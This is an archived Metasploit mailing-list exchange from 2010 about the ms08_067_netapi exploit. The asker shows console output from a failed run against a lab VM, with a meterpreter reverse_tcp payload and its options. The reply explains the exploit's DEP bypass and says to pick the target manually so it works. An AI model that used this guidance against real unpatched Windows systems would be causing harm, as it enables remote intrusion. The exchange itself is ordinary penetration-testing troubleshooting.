Home page logo

metasploit logo Metasploit mailing list archives

Re: ms08_067
From: David Kennedy <kennedyd013 () gmail com>
Date: Wed, 2 Jun 2010 13:02:05 -0400

Based off of the exploit and the way it bypasses data execution prevention
(DEP) it is very much reliant off of hardcoded memory addresses. If
Metasploit isn't 100 percent certain it's a specific version, it will not
exploit the system. In order to force targeting type show targets and set
target <number> and re-run the exploit.

On Wed, Jun 2, 2010 at 12:59 PM, Craig Freyman <craigfreyman () gmail com>wrote:

I have a VM that is vulnerable to ms08_067 but the exploit gives me this:

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2+ - lang:English
[-] Could not determine the exact service pack
[*] Auto-targeting failed, use 'show targets' to manually select one
[*] Exploit completed, but no session was created.
msf exploit(ms08_067_netapi) > version
Framework: 3.4.1-dev.9325
Console  : 3.4.1-dev.9372

 msf exploit(ms08_067_netapi) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST  yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER,

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread,
   LHOST  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting

Any ideas?



  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]